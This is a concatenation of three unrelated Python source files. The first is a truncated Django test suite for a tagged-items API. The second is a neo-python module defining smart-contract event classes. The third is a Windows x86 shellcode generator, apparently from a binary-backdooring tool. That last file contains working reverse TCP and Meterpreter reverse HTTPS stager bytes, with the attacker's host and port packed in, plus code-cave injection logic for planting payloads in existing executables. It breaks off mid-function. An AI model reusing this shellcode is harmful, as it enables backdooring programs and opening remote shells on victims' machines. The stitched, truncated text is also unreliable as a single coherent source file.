r = self.client.post('/api/tagged_items/', {'tag': 'exist tag', 'object_id': article.pk, 'content_type': ct.pk})
self.assertEqual(r.status_code, 201)
self.assertEqual(TaggedItem.objects.count(), item_count + 1)
self.assertEqual(Tag.objects.count(), tag_count)
tagged_item = TaggedItem.objects.all()[0]
self.assertIsNone(tagged_item.author)
def test_create_with_already_added(self):
article = TagTestArticle0Factory()
ct = ContentType.objects.get_for_model(article)
item = TaggedItemFactory(content_object=article, tag__label='already added')
r = self.client.post('/api/tagged_items/', {'tag': 'already added', 'object_id': article.pk, 'content_type': ct.pk})
self.assertEqual(r.status_code, 400)
self.assertEqual(r.data, "'already added' is already added.")
def test_create_with_empty_label(self):
article = TagTestArticle0Factory()
ct = ContentType.objects.get_for_model(article)
r = self.client.post('/api/tagged_items/', {'tag': '', 'object_id': article.pk, 'content_type': ct.pk})
self.assertEqual(r.status_code, 400)
self.assertEqual(r.data, 'Tag label is required.')
def test_create_with_author(self):
self.client.login(username=self.user.username, password='password')
item_count = TaggedItem.objects.count()
tag_count = Tag.objects.count()
article = TagTestArticle0Factory()
ct = ContentType.objects.get_for_model(article)
r = self.client.post('/api/tagged_items/', {'tag': 'new tag', 'object_id': article.pk, 'content_type': ct.pk})
self.assertEqual(r.status_code, 201)
self.assertEqual(TaggedItem.objects.count(), item_count + 1)
self.assertEqual(Tag.objects.count(), tag_count + 1)
tagged_item = TaggedItem.objects.all()[0]
self.assertEqual(tagged_item.author, self.user)
def test_update(self):
item = TaggedItemFactory()
r = self.client.patch('/api/tagged_items/%d/' % item.pk, {'locked': False})
self.assertEqual(r.status_code, 405)
def test_delete(self):
item = TaggedItemFactory()
count = TaggedItem.objects.count()
r = self.client.delete('/api/tagged_items/%d/' % item.pk)
self.assertEqual(r.status_code, 204)
self.assertEqual(TaggedItem.objects.count(), count - 1)
def test_delete_with_locked(self):
item = TaggedItemFactory(locked=True)
count = TaggedItem.objects.count()
r = self.client.delete('/api/tagged_items/%d/' % item.pk)
self.assertEqual(r.status_code, 400)
self.assertEqual(TaggedItem.objects.count(), count)
def test_lock(self):
self.client.login(username=self.user.username, password='password')
item = TaggedItemFactory()
r = self.client.patch('/api/tagged_items/%d/lock/' % item.pk)
self.assertEqual(r.status_code, 200)
self.assertTrue(TaggedItem.objects.get(pk=item.pk).locked)
def test_lock_for_locked_item(self):
self.client.login(username=self.user.username, password='password')
item = TaggedItemFactory(locked=True)
r = self.client.patch('/api/tagged_items/%d/lock/' % item.pk)
self.assertEqual(r.status_code, 400)
self.assertTrue(TaggedItem.objects.get(pk=item.pk).locked)
def test_unlock(self):
self.client.login(username=self.user.username, password='password')
item = TaggedItemFactory(locked=True)
r = self.client.patch('/api/tagged_items/%d/unlock/' % item.pk)
self.assertEqual(r.status_code, 200)
self.assertFalse(TaggedItem.objects.get(pk=item.pk).locked)
def test_unlock_for_unlocked_item(self):
self.client.login(username=self.user.username, password='password')
item = TaggedItemFactory()
r = self.client.patch('/api/tagged_items/%d/unlock/' % item.pk)
self.assertEqual(r.status_code, 400)
self.assertFalse(TaggedItem.objects.get(pk=item.pk).locked)
|
|
from neo.Core.IO.BinaryWriter import BinaryWriter
from neo.Core.IO.BinaryReader import BinaryReader
from neo.Core.UInt160 import UInt160
from neo.Core.BigInteger import BigInteger
from neo.Core.Cryptography.Crypto import Crypto
from neo.IO.MemoryStream import StreamManager
from neo.SmartContract.ContractParameter import ContractParameter, ContractParameterType
from neo.Core.IO.Mixins import SerializableMixin
import binascii
from neo.Core.State.ContractState import ContractState
from neo.logging import log_manager
logger = log_manager.getLogger('vm')
class SmartContractEvent(SerializableMixin):
"""
SmartContractEvent is sent as argument to all smart contract event handlers. It
includes all the information about the current event, such as type, payload,
contract hash, transaction hash, and block number.
- event_type (str)
- contract_hash (UInt160)
- tx_hash (UInt256)
- block_number (int)
- event_payload (object[])
- execution_success (bool)
- test_mode (bool)
`event_payload` is always a list of object, depending on what data types you sent
in the smart contract.
"""
RUNTIME_NOTIFY = "SmartContract.Runtime.Notify" # payload: object[]
RUNTIME_LOG = "SmartContract.Runtime.Log" # payload: bytes
EXECUTION = "SmartContract.Execution.*"
EXECUTION_INVOKE = "SmartContract.Execution.Invoke"
EXECUTION_SUCCESS = "SmartContract.Execution.Success"
EXECUTION_FAIL = "SmartContract.Execution.Fail"
VERIFICATION = "SmartContract.Verification.*"
VERIFICATION_SUCCESS = "SmartContract.Verification.Success"
VERIFICATION_FAIL = "SmartContract.Verification.Fail"
STORAGE = "SmartContract.Storage.*"
STORAGE_GET = "SmartContract.Storage.Get"
STORAGE_PUT = "SmartContract.Storage.Put"
STORAGE_DELETE = "SmartContract.Storage.Delete"
CONTRACT = "SmartContract.Contract.*"
CONTRACT_CREATED = "SmartContract.Contract.Create"
CONTRACT_MIGRATED = "SmartContract.Contract.Migrate"
CONTRACT_DESTROY = "SmartContract.Contract.Destroy"
def __init__(self, event_type, event_payload, contract_hash, block_number, tx_hash, execution_success=False, test_mode=False):
if event_payload and not isinstance(event_payload, ContractParameter):
raise Exception("Event payload must be ContractParameter")
self.event_type = event_type
self.event_payload = event_payload
self.contract_hash = contract_hash
self.block_number = block_number
self.tx_hash = tx_hash
self.execution_success = execution_success
self.test_mode = test_mode
self.token = None
self.contract = None
if not self.event_payload:
self.event_payload = ContractParameter(ContractParameterType.Array, value=[])
if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
if self.event_payload.Type == ContractParameterType.InteropInterface:
self.contract = self.event_payload.Value
def Serialize(self, writer):
writer.WriteVarString(self.event_type.encode('utf-8'))
writer.WriteUInt160(self.contract_hash)
writer.WriteUInt32(self.block_number)
writer.WriteUInt256(self.tx_hash)
self.SerializePayload(writer)
def SerializePayload(self, writer):
if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED] and self.contract:
self.contract.Serialize(writer)
if self.token:
self.token.Serialize(writer)
def Deserialize(self, reader):
self.event_type = reader.ReadVarString().decode('utf-8')
self.contract_hash = reader.ReadUInt160()
self.block_number = reader.ReadUInt32()
self.tx_hash = reader.ReadUInt256()
self.DeserializePayload(reader)
def DeserializePayload(self, reader):
if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
self.contract = ContractState()
self.contract.Deserialize(reader)
try:
from neo.Wallets.NEP5Token import NEP5Token
token = NEP5Token(binascii.hexlify(self.contract.Code.Script))
token.Deserialize(reader)
self.token = token
except Exception as e:
logger.debug("Couldnt deserialize token %s " % e)
def __str__(self):
return "SmartContractEvent(event_type=%s, event_payload=%s, contract_hash=%s, block_number=%s, tx_hash=%s, execution_success=%s, test_mode=%s)" \
% (self.event_type, self.event_payload, self.contract_hash, self.block_number, self.tx_hash, self.execution_success, self.test_mode)
def ToByteArray(self):
stream = StreamManager.GetStream()
writer = BinaryWriter(stream)
self.Serialize(writer)
out = stream.getvalue()
StreamManager.ReleaseStream(stream)
return out
@staticmethod
def FromByteArray(data):
stream = StreamManager.GetStream(data=data)
reader = BinaryReader(stream)
etype = reader.ReadVarString().decode('utf-8')
reader.stream.seek(0)
if etype == SmartContractEvent.RUNTIME_NOTIFY:
event = NotifyEvent(None, None, None, None, None)
else:
event = SmartContractEvent(None, None, None, None, None)
event.Deserialize(reader)
StreamManager.ReleaseStream(stream)
return event
def CheckIsNEP5(self):
if self.contract and self.contract.IsNEP5Contract:
self.token = self.contract._nep_token
def ToJson(self):
jsn = {
'type': self.event_type,
'contract': self.contract_hash.To0xString(),
'block': self.block_number,
'tx': self.tx_hash.To0xString()
}
if self.event_type in [SmartContractEvent.CONTRACT_CREATED, SmartContractEvent.CONTRACT_MIGRATED]:
jsn['contract'] = self.contract.ToJson()
del jsn['contract']['script']
if self.token:
jsn['token'] = self.token.ToJson()
return jsn
class NotifyType:
TRANSFER = b'transfer' # OnTransfer = RegisterAction('transfer', 'to', 'from', 'amount')
APPROVE = b'approve' # OnApprove = RegisterAction('approve', 'addr_from', 'addr_to', 'amount')
REFUND = b'refund' # OnRefund = RegisterAction('refund', 'to', 'amount')
MINT = b'mint' # OnMint = RegisterAction('mint', 'addr_to', 'amount')
class NotifyEvent(SmartContractEvent):
notify_type = None
addr_to = None
addr_from = None
amount = 0
is_standard_notify = False
@property
def ShouldPersist(self):
return self.is_standard_notify and not self.test_mode
@property
def Type(self):
return self.notify_type.decode('utf-8')
@property
def AddressTo(self):
if self.addr_to:
return Crypto.ToAddress(self.addr_to)
return None
@property
def AddressFrom(self):
if self.addr_from:
return Crypto.ToAddress(self.addr_from)
return None
@property
def Contract(self):
return self.contract_hash
@property
def Amount(self):
return self.amount
def __init__(self, event_type, event_payload, contract_hash, block_number, tx_hash, execution_success=False, test_mode=False):
super(NotifyEvent, self).__init__(event_type, event_payload, contract_hash, block_number, tx_hash, execution_success, test_mode)
self.is_standard_notify = False
if self.event_payload.Type == ContractParameterType.Array and len(self.event_payload.Value) > 0:
payload = self.event_payload.Value
plen = len(payload)
self.notify_type = payload[0].Value
empty = UInt160(data=bytearray(20))
try:
if plen == 4 and self.notify_type in [NotifyType.TRANSFER, NotifyType.APPROVE]:
if payload[1].Value is None:
self.addr_from = empty
logger.debug("Using contract addr from address %s " % self.event_payload)
elif payload[1].Value is False:
logger.debug("Using contract addr from address %s " % self.event_payload)
self.addr_from = empty
else:
self.addr_from = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
self.addr_to = UInt160(data=payload[2].Value) if len(payload[2].Value) == 20 else empty
self.amount = int(BigInteger.FromBytes(payload[3].Value)) if isinstance(payload[3].Value, (bytes, bytearray)) else int(payload[3].Value)
self.is_standard_notify = True
elif self.notify_type == NotifyType.REFUND and plen >= 3: # Might have more arguments
self.addr_to = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
self.amount = int(BigInteger.FromBytes(payload[2].Value)) if isinstance(payload[2].Value, (bytes, bytearray)) else int(payload[2].Value)
self.addr_from = self.contract_hash
self.is_standard_notify = True
elif self.notify_type == NotifyType.MINT and plen == 3:
self.addr_to = UInt160(data=payload[1].Value) if len(payload[1].Value) == 20 else empty
self.amount = int(BigInteger.FromBytes(payload[2].Value)) if isinstance(payload[2].Value, (bytes, bytearray)) else int(payload[2].Value)
self.addr_from = self.contract_hash
self.is_standard_notify = True
except Exception as e:
logger.debug("Could not determine notify event: %s %s" % (e, self.event_payload))
elif self.event_payload.Type == ContractParameterType.String:
self.notify_type = self.event_payload.Value
# else:
# logger.debug("NOTIFY %s %s" % (self.event_payload.Type, self.event_payload.Value))
def SerializePayload(self, writer):
writer.WriteVarString(self.notify_type)
if self.is_standard_notify:
writer.WriteUInt160(self.addr_from)
writer.WriteUInt160(self.addr_to)
if self.Amount < 0:
logger.debug("Transfer Amount less than 0")
writer.WriteVarInt(0)
elif self.Amount < 0xffffffffffffffff:
writer.WriteVarInt(self.amount)
else:
logger.debug("Writing Payload value amount greater than ulong long is not allowed. Setting to ulong long max")
writer.WriteVarInt(0xffffffffffffffff)
def DeserializePayload(self, reader):
try:
self.notify_type = reader.ReadVarString()
except Exception as e:
logger.debug("Could not read notify type")
if self.notify_type in [NotifyType.REFUND, NotifyType.APPROVE, NotifyType.TRANSFER]:
try:
self.addr_from = reader.ReadUInt160()
self.addr_to = reader.ReadUInt160()
self.amount = reader.ReadVarInt()
self.is_standard_notify = True
except Exception as e:
logger.debug("Could not transfer notification data")
def ToJson(self):
jsn = super(NotifyEvent, self).ToJson()
jsn['notify_type'] = self.Type
jsn['addr_to'] = self.AddressTo
jsn['addr_from'] = self.AddressFrom
jsn['amount'] = "%s" % self.Amount
return jsn
|
|
'''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win32 shellcodes #
##########################################################
import sys
import struct
from intelmodules import eat_code_caves
class winI32_shellcode():
"""
Windows Intel x32 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.shellcode = ""
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
return False
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Reverse tcp stager. Can be used with windows/shell/reverse_tcp or
windows/meterpreter/reverse_tcp payloads from metasploit.
"""
if self.PORT is None:
print ("Must provide port")
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE\x22\x01\x00\x00" # <---Size of shellcode2 in hex
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
else:
self.shellcode1 += "\xE9\x27\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += ("\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52"
"\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC"
"\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B"
"\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0"
"\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01"
"\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03"
"\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C"
"\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B"
"\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68"
"\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF"
"\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF"
"\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5"
"\x97\x6A\x05\x68"
)
self.shellcode2 += self.pack_ip_addresses() # IP
self.shellcode2 += ("\x68\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += ("\x89\xE6\x6A"
"\x10\x56\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E"
"\x08\x75\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57"
"\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00"
"\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53"
"\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\x89\x00\x00\x00"
self.shellcode1 += ("\x90" * 40
)
self.shellcode2 = ("\x90" * 48
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
This module allows for the user to provide a win32 raw/binary
shellcode. For use with the -U flag. Make sure to use a process safe exit function.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
"\xBE")
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode) + 5)
self.shellcode1 += ("\x00\x00"
"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
self.shellcode1 += "\x90\x5e"
self.shellcode1 += ("\x90\x90\x90"
"\xF2\xA4"
"\xE8\x20\x00\x00"
"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
"\x58\x58\x90\x61"
)
breakupvar = eat_code_caves(flItms, 0, 2)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip("L")), 16))
#else:
# self.shellcode1 += "\xEB\x06\x01\x00\x00"
#Begin shellcode 2:
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 241).rstrip("L")), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 234).rstrip("L")), 16))
else:
self.shellcode2 = "\xE8\xB7\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def meterpreter_reverse_https(self, flItms, CavesPicked={}):
"""
Traditional meterpreter reverse https shellcode from metasploit
modified to support cave jumping.
"""
if self.PORT is None:
print ("Must provide port")
return False
flItms['stager'] = True
breakupvar = eat_code_caves(flItms, 0, 1)
#shellcode1 is the thread
self.shellcode1 = ("\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
"\x5D\x90"
)
self.shellcode1 += "\xBE"
self.shellcode1 += struct.pack("<H", 361 + len(self.HOST))
self.shellcode1 += "\x00\x00" # <---Size of shellcode2 in hex
self.shellcode1 += ("\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
"\x89\xF1"
)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x44" # <--length of shellcode below
